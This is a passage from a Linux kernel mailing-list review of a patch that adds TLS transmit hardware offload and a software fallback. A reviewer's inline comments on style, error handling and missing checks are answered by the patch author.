>> +/* At this point, there should be no references on this
>> + * socket and no in-flight SKBs associated with this
>> + * socket, so it is safe to free all the resources.
>> + */
>> +void tls_device_sk_destruct(struct sock *sk)
>> +{
>> +    struct tls_context *tls_ctx = tls_get_ctx(sk);
>> +    struct tls_offload_context *ctx = tls_offload_ctx(tls_ctx);
>> +
>> +    if (ctx->open_record)
>> +        destroy_record(ctx->open_record);
>> +
>> +    delete_all_records(ctx);
>> +    crypto_free_aead(ctx->aead_send);
>> +    ctx->sk_destruct(sk);
>> +    static_branch_dec(&clean_acked_data_enabled);
>> +
>> +    if (refcount_dec_and_test(&tls_ctx->refcount))
>> +        tls_device_queue_ctx_destruction(tls_ctx);
>> +}
>> +EXPORT_SYMBOL(tls_device_sk_destruct);
>> +
>> +static inline void tls_append_frag(struct tls_record_info *record,
> 
> I think Dave has already mentioned this, but you can drop all the 
> "inline" tags.
> 

I'll fix it for V4.

>> +                   struct page_frag *pfrag,
>> +                   int size)
>> +{
>> +    skb_frag_t *frag;
>> +
>> +    frag = &record->frags[record->num_frags - 1];
>> +    if (frag->page.p == pfrag->page &&
>> +        frag->page_offset + frag->size == pfrag->offset) {
>> +        frag->size += size;
>> +    } else {
>> +        ++frag;
> 
> Should this get checked against MAX_SKB_FRAGS to be sure we haven't gone 
> off the end of the array?
> 

No, the callers of this function guarantee that there are less than 
MAX_SKB_FRAGS. Specifically, we push the record to TCP once there are 
MAX_SKB_FRAGS - 1 frags.

>> +        frag->page.p = pfrag->page;
>> +        frag->page_offset = pfrag->offset;
>> +        frag->size = size;
>> +        ++record->num_frags;
>> +        get_page(pfrag->page);
>> +    }
>> +
>> +    pfrag->offset += size;
>> +    record->len += size;
>> +}
>> +
>> +static inline int tls_push_record(struct sock *sk,
>> +                  struct tls_context *ctx,
>> +                  struct tls_offload_context *offload_ctx,
>> +                  struct tls_record_info *record,
>> +                  struct page_frag *pfrag,
>> +                  int flags,
>> +                  unsigned char record_type)
>> +{
>> +    struct tcp_sock *tp = tcp_sk(sk);
>> +    struct page_frag dummy_tag_frag;
>> +    skb_frag_t *frag;
>> +    int i;
>> +
>> +    /* fill prepand */
> 
> s/prepand/prepend/
> 

Fixed.

>> +    frag = &record->frags[0];
>> +    tls_fill_prepend(ctx,
>> +             skb_frag_address(frag),
>> +             record->len - ctx->prepend_size,
>> +             record_type);
>> +
>> +    /* HW doesn't care about the data in the tag, because it fills 
>> it. */
>> +    dummy_tag_frag.page = skb_frag_page(frag);
>> +    dummy_tag_frag.offset = 0;
>> +
>> +    tls_append_frag(record, &dummy_tag_frag, ctx->tag_size);
>> +    record->end_seq = tp->write_seq + record->len;
>> +    spin_lock_irq(&offload_ctx->lock);
>> +    list_add_tail(&record->list, &offload_ctx->records_list);
>> +    spin_unlock_irq(&offload_ctx->lock);
>> +    offload_ctx->open_record = NULL;
>> +    set_bit(TLS_PENDING_CLOSED_RECORD, &ctx->flags);
>> +    tls_advance_record_sn(sk, ctx);
>> +
>> +    for (i = 0; i < record->num_frags; i++) {
>> +        frag = &record->frags[i];
>> +        sg_unmark_end(&offload_ctx->sg_tx_data[i]);
>> +        sg_set_page(&offload_ctx->sg_tx_data[i], skb_frag_page(frag),
>> +                frag->size, frag->page_offset);
>> +        sk_mem_charge(sk, frag->size);
>> +        get_page(skb_frag_page(frag));
>> +    }
>> +    sg_mark_end(&offload_ctx->sg_tx_data[record->num_frags - 1]);
>> +
>> +    /* all ready, send */
>> +    return tls_push_sg(sk, ctx, offload_ctx->sg_tx_data, 0, flags);
>> +}
>> +
>> +static inline int tls_create_new_record(struct tls_offload_context 
>> *offload_ctx,
>> +                    struct page_frag *pfrag,
>> +                    size_t prepend_size)
>> +{
>> +    struct tls_record_info *record;
>> +    skb_frag_t *frag;
>> +
>> +    record = kmalloc(sizeof(*record), GFP_KERNEL);
>> +    if (!record)
>> +        return -ENOMEM;
>> +
>> +    frag = &record->frags[0];
>> +    __skb_frag_set_page(frag, pfrag->page);
>> +    frag->page_offset = pfrag->offset;
>> +    skb_frag_size_set(frag, prepend_size);
>> +
>> +    get_page(pfrag->page);
>> +    pfrag->offset += prepend_size;
>> +
>> +    record->num_frags = 1;
>> +    record->len = prepend_size;
>> +    offload_ctx->open_record = record;
>> +    return 0;
>> +}
>> +
>> +static inline int tls_do_allocation(struct sock *sk,
>> +                    struct tls_offload_context *offload_ctx,
>> +                    struct page_frag *pfrag,
>> +                    size_t prepend_size)
>> +{
>> +    int ret;
>> +
>> +    if (!offload_ctx->open_record) {
>> +        if (unlikely(!skb_page_frag_refill(prepend_size, pfrag,
>> +                           sk->sk_allocation))) {
>> +            sk->sk_prot->enter_memory_pressure(sk);
>> +            sk_stream_moderate_sndbuf(sk);
>> +            return -ENOMEM;
>> +        }
>> +
>> +        ret = tls_create_new_record(offload_ctx, pfrag, prepend_size);
>> +        if (ret)
>> +            return ret;
>> +
>> +        if (pfrag->size > pfrag->offset)
>> +            return 0;
>> +    }
>> +
>> +    if (!sk_page_frag_refill(sk, pfrag))
>> +        return -ENOMEM;
> 
> If a new record was created and then this fails, do you need to free the 
> new record?
> 

It is not necessary, because once a new record is created we set 
offload_ctx->open_record, which is checked before trying to allocate a 
new record.

Overall, we prefer not to free memory only to allocate it again once a 
bit more memory is available.

>> +
>> +    return 0;
>> +}
>> +
>> +static int tls_push_data(struct sock *sk,
>> +             struct iov_iter *msg_iter,
>> +             size_t size, int flags,
>> +             unsigned char record_type)
>> +{
>> +    struct tls_context *tls_ctx = tls_get_ctx(sk);
>> +    struct tls_offload_context *ctx = tls_offload_ctx(tls_ctx);
>> +    int tls_push_record_flags = flags | MSG_SENDPAGE_NOTLAST;
>> +    int more = flags & (MSG_SENDPAGE_NOTLAST | MSG_MORE);
>> +    struct tls_record_info *record = ctx->open_record;
>> +    struct page_frag *pfrag;
>> +    size_t orig_size = size;
>> +    u32 max_open_record_len;
>> +    int copy, rc = 0;
>> +    bool done = false;
>> +    long timeo;
>> +
>> +    if (flags &
>> +        ~(MSG_MORE | MSG_DONTWAIT | MSG_NOSIGNAL | 
>> MSG_SENDPAGE_NOTLAST))
>> +        return -ENOTSUPP;
>> +
>> +    if (sk->sk_err)
>> +        return -sk->sk_err;
>> +
>> +    timeo = sock_sndtimeo(sk, flags & MSG_DONTWAIT);
>> +    rc = tls_complete_pending_work(sk, tls_ctx, flags, &timeo);
>> +    if (rc < 0)
>> +        return rc;
>> +
>> +    pfrag = sk_page_frag(sk);
>> +
>> +    /* TLS_TLS_HEADER_SIZE is not counted as part of the TLS record, and
> 
> s/TLS_TLS_HEADER_SIZE/TLS_HEADER_SIZE/
> 

Fixed.

>> +     * we need to leave room for an authentication tag.
>> +     */
>> +    max_open_record_len = TLS_MAX_PAYLOAD_SIZE +
>> +                  tls_ctx->prepend_size;
>> +    do {
>> +        if (tls_do_allocation(sk, ctx, pfrag,
>> +                      tls_ctx->prepend_size)) {
> 
> So you do this block if tls_do_allocation() fails, right?  This is not 
> clear to the drive-by reader, it looks a bit like the opposite.  I'd 
> suggest something a little more obvious like
> 
>          rc = tls_do_allocation(sk, ctx, pfrag,
>                         tls_ctx->prepend_size)
>          if (rc) {
> 
> 

Sure.

>> +            rc = sk_stream_wait_memory(sk, &timeo);
>> +            if (!rc)
>> +                continue;
>> +
>> +            record = ctx->open_record;
>> +            if (!record)
>> +                break;
>> +handle_error:
>> +            if (record_type != TLS_RECORD_TYPE_DATA) {
>> +                /* avoid sending partial
>> +                 * record with type !=
>> +                 * application_data
>> +                 */
>> +                size = orig_size;
>> +                destroy_record(record);
>> +                ctx->open_record = NULL;
>> +            } else if (record->len > tls_ctx->prepend_size) {
>> +                goto last_record;
>> +            }
>> +
>> +            break;
>> +        }
>> +
>> +        record = ctx->open_record;
>> +        copy = min_t(size_t, size, (pfrag->size - pfrag->offset));
>> +        copy = min_t(size_t, copy, (max_open_record_len - record->len));
>> +
>> +        if (copy_from_iter_nocache(page_address(pfrag->page) +
>> +                           pfrag->offset,
>> +                       copy, msg_iter) != copy) {
>> +            rc = -EFAULT;
>> +            goto handle_error;
> 
> This jumping around begins to feel a bit convoluted - is there another 
> way you can handle this?
> 

It's somewhat complicated to move it, because the last record handling 
logic must also be there inside the loop, and the error handling code 
might be required to close a record. If you have an idea, patches are 
welcome :)

>> +        }
>> +        tls_append_frag(record, pfrag, copy);
>> +
>> +        size -= copy;
>> +        if (!size) {
>> +last_record:
>> +            tls_push_record_flags = flags;
>> +            if (more) {
>> +                tls_ctx->pending_open_record_frags =
>> +                        record->num_frags;
>> +                break;
>> +            }
>> +
>> +            done = true;
>> +        }
>> +
>> +        if ((done) || record->len >= max_open_record_len ||
> 
> parens around (done) are unnecessary
> 

Fixed.

>> +            (record->num_frags >= MAX_SKB_FRAGS - 1)) {
>> +            rc = tls_push_record(sk,
>> +                         tls_ctx,
>> +                         ctx,
>> +                         record,
>> +                         pfrag,
>> +                         tls_push_record_flags,
>> +                         record_type);
>> +            if (rc < 0)
>> +                break;
>> +        }
>> +    } while (!done);
>> +
>> +    if (orig_size - size > 0)
>> +        rc = orig_size - size;
> 
> If there was an error returned from tls_push_record(), will this 
> overwrite the error rc code?
> 

Yes, this is on purpose. We want to return the number of bytes 
successfully sent before returning an error. See "do_error" and "out" 
labels in tcp_sendmsg for similar semantics.

>> +
>> +    return rc;
>> +}
>> +
>> +int tls_device_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
>> +{
>> +    unsigned char record_type = TLS_RECORD_TYPE_DATA;
>> +    int rc = 0;
> 
> rc initialization unnecessary
> 

Fixed.

>> +
>> +    lock_sock(sk);
>> +
>> +    if (unlikely(msg->msg_controllen)) {
>> +        rc = tls_proccess_cmsg(sk, msg, &record_type);
>> +        if (rc)
>> +            goto out;
>> +    }
>> +
>> +    rc = tls_push_data(sk, &msg->msg_iter, size,
>> +               msg->msg_flags, record_type);
>> +
>> +out:
>> +    release_sock(sk);
>> +    return rc;
>> +}
>> +
>> +int tls_device_sendpage(struct sock *sk, struct page *page,
>> +            int offset, size_t size, int flags)
>> +{
>> +    struct iov_iter    msg_iter;
>> +    char *kaddr = kmap(page);
>> +    struct kvec iov;
>> +    int rc = 0;
> 
> rc initialization unnecessary
> 

Fixed.

>> +
>> +    if (flags & MSG_SENDPAGE_NOTLAST)
>> +        flags |= MSG_MORE;
>> +
>> +    lock_sock(sk);
>> +
>> +    if (flags & MSG_OOB) {
>> +        rc = -ENOTSUPP;
>> +        goto out;
>> +    }
>> +
>> +    iov.iov_base = kaddr + offset;
>> +    iov.iov_len = size;
>> +    iov_iter_kvec(&msg_iter, WRITE | ITER_KVEC, &iov, 1, size);
>> +    rc = tls_push_data(sk, &msg_iter, size,
>> +               flags, TLS_RECORD_TYPE_DATA);
>> +    kunmap(page);
>> +
>> +out:
>> +    release_sock(sk);
>> +    return rc;
>> +}
>> +
>> +struct tls_record_info *tls_get_record(struct tls_offload_context 
>> *context,
>> +                       u32 seq, u64 *p_record_sn)
>> +{
>> +    u64 record_sn = context->hint_record_sn;
>> +    struct tls_record_info *info;
>> +
>> +    info = context->retransmit_hint;
>> +    if (!info ||
>> +        before(seq, info->end_seq - info->len)) {
>> +        /* if retransmit_hint is irrelevant start
>> +         * from the begging of the list
> 
> s/begging/beginning/
> 

Fixed.

>> +         */
>> +        info = list_first_entry(&context->records_list,
>> +                    struct tls_record_info, list);
>> +        record_sn = context->unacked_record_sn;
>> +    }
>> +
>> +    list_for_each_entry_from(info, &context->records_list, list) {
>> +        if (before(seq, info->end_seq)) {
>> +            if (!context->retransmit_hint ||
>> +                after(info->end_seq,
>> +                  context->retransmit_hint->end_seq)) {
>> +                context->hint_record_sn = record_sn;
>> +                context->retransmit_hint = info;
>> +            }
>> +            *p_record_sn = record_sn;
>> +            return info;
>> +        }
>> +        record_sn++;
>> +    }
>> +
>> +    return NULL;
>> +}
>> +EXPORT_SYMBOL(tls_get_record);
>> +
>> +static int tls_device_push_pending_record(struct sock *sk, int flags)
>> +{
>> +    struct iov_iter    msg_iter;
>> +
>> +    iov_iter_kvec(&msg_iter, WRITE | ITER_KVEC, NULL, 0, 0);
>> +    return tls_push_data(sk, &msg_iter, 0, flags, TLS_RECORD_TYPE_DATA);
>> +}
>> +
>> +int tls_set_device_offload(struct sock *sk, struct tls_context *ctx)
>> +{
>> +    u16 nonece_size, tag_size, iv_size, rec_seq_size;
> 
> s/nonece/nonce/
> 

Fixed.

>> +    struct tls_record_info *start_marker_record;
>> +    struct tls_offload_context *offload_ctx;
>> +    struct tls_crypto_info *crypto_info;
>> +    struct net_device *netdev;
>> +    char *iv, *rec_seq;
>> +    struct sk_buff *skb;
>> +    int rc = -EINVAL;
>> +    __be64 rcd_sn;
>> +
>> +    if (!ctx)
>> +        goto out;
>> +
>> +    if (ctx->priv_ctx) {
>> +        rc = -EEXIST;
>> +        goto out;
>> +    }
>> +
>> +    start_marker_record = kmalloc(sizeof(*start_marker_record), 
>> GFP_KERNEL);
>> +    if (!start_marker_record) {
>> +        rc = -ENOMEM;
>> +        goto out;
>> +    }
>> +
>> +    offload_ctx = kzalloc(TLS_OFFLOAD_CONTEXT_SIZE, GFP_KERNEL);
>> +    if (!offload_ctx) {
>> +        rc = -ENOMEM;
>> +        goto free_marker_record;
>> +    }
>> +
>> +    crypto_info = &ctx->crypto_send;
>> +    switch (crypto_info->cipher_type) {
>> +    case TLS_CIPHER_AES_GCM_128: {
>> +        nonece_size = TLS_CIPHER_AES_GCM_128_IV_SIZE;
>> +        tag_size = TLS_CIPHER_AES_GCM_128_TAG_SIZE;
>> +        iv_size = TLS_CIPHER_AES_GCM_128_IV_SIZE;
>> +        iv = ((struct tls12_crypto_info_aes_gcm_128 *)crypto_info)->iv;
>> +        rec_seq_size = TLS_CIPHER_AES_GCM_128_REC_SEQ_SIZE;
>> +        rec_seq =
>> +         ((struct tls12_crypto_info_aes_gcm_128 *)crypto_info)->rec_seq;
>> +        break;
>> +    }
> 
> {}'s are unnecessary here
> 

Fixed.

>> +    default:
>> +        rc = -EINVAL;
>> +        goto free_offload_ctx;
>> +    }
>> +
>> +    ctx->prepend_size = TLS_HEADER_SIZE + nonece_size;
>> +    ctx->tag_size = tag_size;
>> +    ctx->iv_size = iv_size;
>> +    ctx->iv = kmalloc(iv_size + TLS_CIPHER_AES_GCM_128_SALT_SIZE,
>> +              GFP_KERNEL);
>> +    if (!ctx->iv) {
>> +        rc = -ENOMEM;
>> +        goto free_offload_ctx;
>> +    }
>> +
>> +    memcpy(ctx->iv + TLS_CIPHER_AES_GCM_128_SALT_SIZE, iv, iv_size);
>> +
>> +    ctx->rec_seq_size = rec_seq_size;
>> +    ctx->rec_seq = kmalloc(rec_seq_size, GFP_KERNEL);
>> +    if (!ctx->rec_seq) {
>> +        rc = -ENOMEM;
>> +        goto free_iv;
>> +    }
>> +    memcpy(ctx->rec_seq, rec_seq, rec_seq_size);
>> +
>> +    rc = tls_sw_fallback_init(sk, offload_ctx, crypto_info);
>> +    if (rc)
>> +        goto free_rec_seq;
>> +
>> +    /* start at rec_seq - 1 to account for the start marker record */
>> +    memcpy(&rcd_sn, ctx->rec_seq, sizeof(rcd_sn));
>> +    offload_ctx->unacked_record_sn = be64_to_cpu(rcd_sn) - 1;
>> +
>> +    start_marker_record->end_seq = tcp_sk(sk)->write_seq;
>> +    start_marker_record->len = 0;
>> +    start_marker_record->num_frags = 0;
>> +
>> +    INIT_LIST_HEAD(&offload_ctx->records_list);
>> +    list_add_tail(&start_marker_record->list, 
>> &offload_ctx->records_list);
>> +    spin_lock_init(&offload_ctx->lock);
>> +
>> +    static_branch_inc(&clean_acked_data_enabled);
>> +    inet_csk(sk)->icsk_clean_acked = &tls_icsk_clean_acked;
>> +    ctx->push_pending_record = tls_device_push_pending_record;
>> +    offload_ctx->sk_destruct = sk->sk_destruct;
>> +
>> +    /* TLS offload is greatly simplified if we don't send
>> +     * SKBs where only part of the payload needs to be encrypted.
>> +     * So mark the last skb in the write queue as end of record.
>> +     */
>> +    skb = tcp_write_queue_tail(sk);
>> +    if (skb)
>> +        TCP_SKB_CB(skb)->eor = 1;
>> +
>> +    refcount_set(&ctx->refcount, 1);
>> +
>> +    /* We support starting offload on multiple sockets
>> +     * concurrently, so we only need a read lock here.
>> +     * This lock must preceed get_netdev_for_sock to prevent races 
>> between
>> +     * NETDEV_DOWN and setsockopt.
>> +     */
>> +    down_read(&device_offload_lock);
>> +    netdev = get_netdev_for_sock(sk);
>> +    if (!netdev) {
>> +        pr_err_ratelimited("%s: netdev not found\n", __func__);
>> +        rc = -EINVAL;
>> +        goto release_lock;
>> +    }
>> +
>> +    if (!(netdev->features & NETIF_F_HW_TLS_TX)) {
>> +        rc = -ENOTSUPP;
>> +        goto release_netdev;
>> +    }
>> +
>> +    /* Avoid offloading if the device is down
>> +     * We don't want to offload new flows after
>> +     * the NETDEV_DOWN event
>> +     */
>> +    if (!(netdev->flags & IFF_UP)) {
>> +        rc = -EINVAL;
>> +        goto release_netdev;
>> +    }
>> +
>> +    ctx->priv_ctx = offload_ctx;
>> +    rc = netdev->tlsdev_ops->tls_dev_add(netdev, sk, 
>> TLS_OFFLOAD_CTX_DIR_TX,
> 
> Do you have a check somewhere that guarantees any netdev with 
> NETIF_F_HW_TLS_TX set actually has the tlsdev_ops defined so you can 
> call this without checking it?
> 

I'll add a check in the FEAT_CHANGE netdev event.

>> +                         &ctx->crypto_send,
>> +                         tcp_sk(sk)->write_seq);
>> +    if (rc)
>> +        goto release_netdev;
>> +
>> +    ctx->netdev = netdev;
>> +
>> +    spin_lock_irq(&tls_device_lock);
>> +    list_add_tail(&ctx->list, &tls_device_list);
>> +    spin_unlock_irq(&tls_device_lock);
>> +
>> +    sk->sk_validate_xmit_skb = tls_validate_xmit_skb;
>> +    /* following this assignment tls_is_sk_tx_device_offloaded
>> +     * will return true and the context might be accessed
>> +     * by the netdev's xmit function.
>> +     */
>> +    smp_store_release(&sk->sk_destruct,
>> +              &tls_device_sk_destruct);
>> +    up_read(&device_offload_lock);
>> +    goto out;
>> +
>> +release_netdev:
>> +    dev_put(netdev);
>> +release_lock:
>> +    up_read(&device_offload_lock);
>> +    static_branch_dec(&clean_acked_data_enabled);
>> +    crypto_free_aead(offload_ctx->aead_send);
>> +free_rec_seq:
>> +    kfree(ctx->rec_seq);
>> +free_iv:
>> +    kfree(ctx->iv);
>> +free_offload_ctx:
>> +    kfree(offload_ctx);
>> +    ctx->priv_ctx = NULL;
>> +free_marker_record:
>> +    kfree(start_marker_record);
>> +out:
>> +    return rc;
>> +}
>> +
>> +static int tls_device_down(struct net_device *netdev)
>> +{
>> +    struct tls_context *ctx, *tmp;
>> +    unsigned long flags;
>> +    LIST_HEAD(list);
>> +
>> +    /* Request a write lock to block new offload attempts
>> +     */
> 
> single line comment
> 

Fixed.

>> +    down_write(&device_offload_lock);
>> +
>> +    spin_lock_irqsave(&tls_device_lock, flags);
>> +    list_for_each_entry_safe(ctx, tmp, &tls_device_list, list) {
>> +        if (ctx->netdev != netdev ||
>> +            !refcount_inc_not_zero(&ctx->refcount))
>> +            continue;
>> +
>> +        list_move(&ctx->list, &list);
>> +    }
>> +    spin_unlock_irqrestore(&tls_device_lock, flags);
>> +
>> +    list_for_each_entry_safe(ctx, tmp, &list, list)    {
>> +        netdev->tlsdev_ops->tls_dev_del(netdev, ctx,
>> +                        TLS_OFFLOAD_CTX_DIR_TX);
> 
> Are tlsdev_ops and tls_dev_del defined?
> 

I'll add a check in FEAT_CHANGE.

>> +        ctx->netdev = NULL;
>> +        dev_put(netdev);
>> +        list_del_init(&ctx->list);
>> +
>> +        if (refcount_dec_and_test(&ctx->refcount))
>> +            tls_device_free_ctx(ctx);
>> +    }
>> +
>> +    up_write(&device_offload_lock);
>> +
>> +    flush_work(&tls_device_gc_work);
>> +
>> +    return NOTIFY_DONE;
>> +}
>> +
>> +static int tls_dev_event(struct notifier_block *this, unsigned long 
>> event,
>> +             void *ptr)
>> +{
>> +    struct net_device *dev = netdev_notifier_info_to_dev(ptr);
>> +
>> +    if (!(dev->features & NETIF_F_HW_TLS_TX))
>> +        return NOTIFY_DONE;
>> +
>> +    switch (event) {
>> +    case NETDEV_REGISTER:
>> +    case NETDEV_FEAT_CHANGE:
>> +        return dev->tlsdev_ops ? NOTIFY_DONE : NOTIFY_BAD;
> 
> Okay, you've got a check for tlsdev_ops, but what about the function 
> pointers that are assumed to be good?
> 

You are right, I'll add a check here.

>> +    case NETDEV_DOWN:
>> +        return tls_device_down(dev);
>> +    }
>> +    return NOTIFY_DONE;
>> +}
>> +
>> +static struct notifier_block tls_dev_notifier = {
>> +    .notifier_call    = tls_dev_event,
>> +};
>> +
>> +void __init tls_device_init(void)
>> +{
>> +    register_netdevice_notifier(&tls_dev_notifier);
>> +}
>> +
>> +void __exit tls_device_cleanup(void)
>> +{
>> +    unregister_netdevice_notifier(&tls_dev_notifier);
>> +    flush_work(&tls_device_gc_work);
>> +}
>> diff --git a/net/tls/tls_device_fallback.c 
>> b/net/tls/tls_device_fallback.c
>> new file mode 100644
>> index 000000000000..f1302f479209
>> --- /dev/null
>> +++ b/net/tls/tls_device_fallback.c
>> @@ -0,0 +1,412 @@
>> +/* Copyright (c) 2018, Mellanox Technologies All rights reserved.
>> + *
>> + * This software is available to you under a choice of one of two
>> + * licenses.  You may choose to be licensed under the terms of the GNU
>> + * General Public License (GPL) Version 2, available from the file
>> + * COPYING in the main directory of this source tree, or the
>> + * OpenIB.org BSD license below:
>> + *
>> + *     Redistribution and use in source and binary forms, with or
>> + *     without modification, are permitted provided that the following
>> + *     conditions are met:
>> + *
>> + *      - Redistributions of source code must retain the above
>> + *        copyright notice, this list of conditions and the following
>> + *        disclaimer.
>> + *
>> + *      - Redistributions in binary form must reproduce the above
>> + *        copyright notice, this list of conditions and the following
>> + *        disclaimer in the documentation and/or other materials
>> + *        provided with the distribution.
>> + *
>> + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
>> + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
>> + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
>> + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
>> + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
>> + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
>> + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
>> + * SOFTWARE.
>> + */
>> +
>> +#include <net/tls.h>
>> +#include <crypto/aead.h>
>> +#include <crypto/scatterwalk.h>
>> +#include <net/ip6_checksum.h>
>> +
>> +static void chain_to_walk(struct scatterlist *sg, struct scatter_walk 
>> *walk)
>> +{
>> +    struct scatterlist *src = walk->sg;
>> +    int diff = walk->offset - src->offset;
>> +
>> +    sg_set_page(sg, sg_page(src),
>> +            src->length - diff, walk->offset);
>> +
>> +    scatterwalk_crypto_chain(sg, sg_next(src), 0, 2);
>> +}
>> +
>> +static int tls_enc_record(struct aead_request *aead_req,
>> +              struct crypto_aead *aead, char *aad, char *iv,
>> +              __be64 rcd_sn, struct scatter_walk *in,
>> +              struct scatter_walk *out, int *in_len)
>> +{
>> +    unsigned char buf[TLS_HEADER_SIZE + TLS_CIPHER_AES_GCM_128_IV_SIZE];
>> +    struct scatterlist sg_in[3];
>> +    struct scatterlist sg_out[3];
>> +    u16 len;
>> +    int rc;
>> +
>> +    len = min_t(int, *in_len, ARRAY_SIZE(buf));
>> +
>> +    scatterwalk_copychunks(buf, in, len, 0);
>> +    scatterwalk_copychunks(buf, out, len, 1);
>> +
>> +    *in_len -= len;
>> +    if (!*in_len)
>> +        return 0;
>> +
>> +    scatterwalk_pagedone(in, 0, 1);
>> +    scatterwalk_pagedone(out, 1, 1);
>> +
>> +    len = buf[4] | (buf[3] << 8);
>> +    len -= TLS_CIPHER_AES_GCM_128_IV_SIZE;
>> +
>> +    tls_make_aad(aad, len - TLS_CIPHER_AES_GCM_128_TAG_SIZE,
>> +             (char *)&rcd_sn, sizeof(rcd_sn), buf[0]);
>> +
>> +    memcpy(iv + TLS_CIPHER_AES_GCM_128_SALT_SIZE, buf + TLS_HEADER_SIZE,
>> +           TLS_CIPHER_AES_GCM_128_IV_SIZE);
>> +
>> +    sg_init_table(sg_in, ARRAY_SIZE(sg_in));
>> +    sg_init_table(sg_out, ARRAY_SIZE(sg_out));
>> +    sg_set_buf(sg_in, aad, TLS_AAD_SPACE_SIZE);
>> +    sg_set_buf(sg_out, aad, TLS_AAD_SPACE_SIZE);
>> +    chain_to_walk(sg_in + 1, in);
>> +    chain_to_walk(sg_out + 1, out);
>> +
>> +    *in_len -= len;
>> +    if (*in_len < 0) {
>> +        *in_len += TLS_CIPHER_AES_GCM_128_TAG_SIZE;
>> +        if (*in_len < 0)
>> +        /* the input buffer doesn't contain the entire record.
> 
> s/./, so/
> 

Fixed.

>> +         * trim len accordingly. The resulting authentication tag
>> +         * will contain garbage. but we don't care as we won't
> 
> s/garbage./garbage,/
> 

Fixed.

>> +         * include any of it in the output skb
>> +         * Note that we assume the output buffer length
>> +         * is larger then input buffer length + tag size
>> +         */
>> +            len += *in_len;
> 
> Especially with that large of a comment, I think the if (*in_len < 0) 
> should be after and right next to the one line it protects.
> 

Sure.

>> +
>> +        *in_len = 0;
>> +    }
>> +
>> +    if (*in_len) {
>> +        scatterwalk_copychunks(NULL, in, len, 2);
>> +        scatterwalk_pagedone(in, 0, 1);
>> +        scatterwalk_copychunks(NULL, out, len, 2);
>> +        scatterwalk_pagedone(out, 1, 1);
>> +    }
>> +
>> +    len -= TLS_CIPHER_AES_GCM_128_TAG_SIZE;
>> +    aead_request_set_crypt(aead_req, sg_in, sg_out, len, iv);
>> +
>> +    rc = crypto_aead_encrypt(aead_req);
>> +
>> +    return rc;
>> +}
>> +
>> +static void tls_init_aead_request(struct aead_request *aead_req,
>> +                  struct crypto_aead *aead)
>> +{
>> +    aead_request_set_tfm(aead_req, aead);
>> +    aead_request_set_ad(aead_req, TLS_AAD_SPACE_SIZE);
>> +}
>> +
>> +static struct aead_request *tls_alloc_aead_request(struct crypto_aead 
>> *aead,
>> +                           gfp_t flags)
>> +{
>> +    unsigned int req_size = sizeof(struct aead_request) +
>> +        crypto_aead_reqsize(aead);
>> +    struct aead_request *aead_req;
>> +
>> +    aead_req = kzalloc(req_size, flags);
>> +    if (!aead_req)
>> +        return NULL;
>> +
>> +    tls_init_aead_request(aead_req, aead);
>> +    return aead_req;
> 
> This could be turned around and shortened a little
> 
>      aead_req = kzalloc(req_size, flags);
>      if (aead_req)
>          tls_init_aead_request(aead_req, aead);
>      return aead_req;
> 
>

Fixed. Thanks.


>> +}
>> +
>> +static int tls_enc_records(struct aead_request *aead_req,
>> +               struct crypto_aead *aead, struct scatterlist *sg_in,
>> +               struct scatterlist *sg_out, char *aad, char *iv,
>> +               u64 rcd_sn, int len)
>> +{
>> +    struct scatter_walk out, in;
>> +    int rc;
>> +
>> +    scatterwalk_start(&in, sg_in);
>> +    scatterwalk_start(&out, sg_out);
>> +
>> +    do {
>> +        rc = tls_enc_record(aead_req, aead, aad, iv,
>> +                    cpu_to_be64(rcd_sn), &in, &out, &len);
>> +        rcd_sn++;
>> +
>> +    } while (rc == 0 && len);
>> +
>> +    scatterwalk_done(&in, 0, 0);
>> +    scatterwalk_done(&out, 1, 0);
>> +
>> +    return rc;
>> +}
>> +
>> +/* Can't use icsk->icsk_af_ops->send_check here because the ip addresses
>> + * might have been changed by NAT.
>> + */
>> +static inline void update_chksum(struct sk_buff *skb, int headln)
>> +{
>> +    struct tcphdr *th = tcp_hdr(skb);
>> +    int datalen = skb->len - headln;
>> +    const struct ipv6hdr *ipv6h;
>> +    const struct iphdr *iph;
>> +
>> +    /* We only changed the payload so if we are using partial we don't
>> +     * need to update anything.
>> +     */
>> +    if (likely(skb->ip_summed == CHECKSUM_PARTIAL))
>> +        return;
>> +
>> +    skb->ip_summed = CHECKSUM_PARTIAL;
>> +    skb->csum_start = skb_transport_header(skb) - skb->head;
>> +    skb->csum_offset = offsetof(struct tcphdr, check);
>> +
>> +    if (skb->sk->sk_family == AF_INET6) {
>> +        ipv6h = ipv6_hdr(skb);
>> +        th->check = ~csum_ipv6_magic(&ipv6h->saddr, &ipv6h->daddr,
>> +                         datalen, IPPROTO_TCP, 0);
>> +    } else {
>> +        iph = ip_hdr(skb);
>> +        th->check = ~csum_tcpudp_magic(iph->saddr, iph->daddr, datalen,
>> +                           IPPROTO_TCP, 0);
>> +    }
>> +}
>> +
>> +static void complete_skb(struct sk_buff *nskb, struct sk_buff *skb, 
>> int headln)
>> +{
>> +    skb_copy_header(nskb, skb);
>> +
>> +    skb_put(nskb, skb->len);
>> +    memcpy(nskb->data, skb->data, headln);
>> +    update_chksum(nskb, headln);
>> +
>> +    nskb->destructor = skb->destructor;
>> +    nskb->sk = skb->sk;
>> +    skb->destructor = NULL;
>> +    skb->sk = NULL;
>> +    refcount_add(nskb->truesize - skb->truesize,
>> +             &nskb->sk->sk_wmem_alloc);
>> +}
>> +
>> +/* This function may be called after the user socket is already
>> + * closed so make sure we don't use anything freed during
>> + * tls_sk_proto_close here
>> + */
>> +static struct sk_buff *tls_sw_fallback(struct sock *sk, struct 
>> sk_buff *skb)
>> +{
>> +    int tcp_header_size = tcp_hdrlen(skb);
>> +    int tcp_payload_offset = skb_transport_offset(skb) + 
>> tcp_header_size;
>> +    int payload_len = skb->len - tcp_payload_offset;
>> +    struct tls_context *tls_ctx = tls_get_ctx(sk);
>> +    struct tls_offload_context *ctx = tls_offload_ctx(tls_ctx);
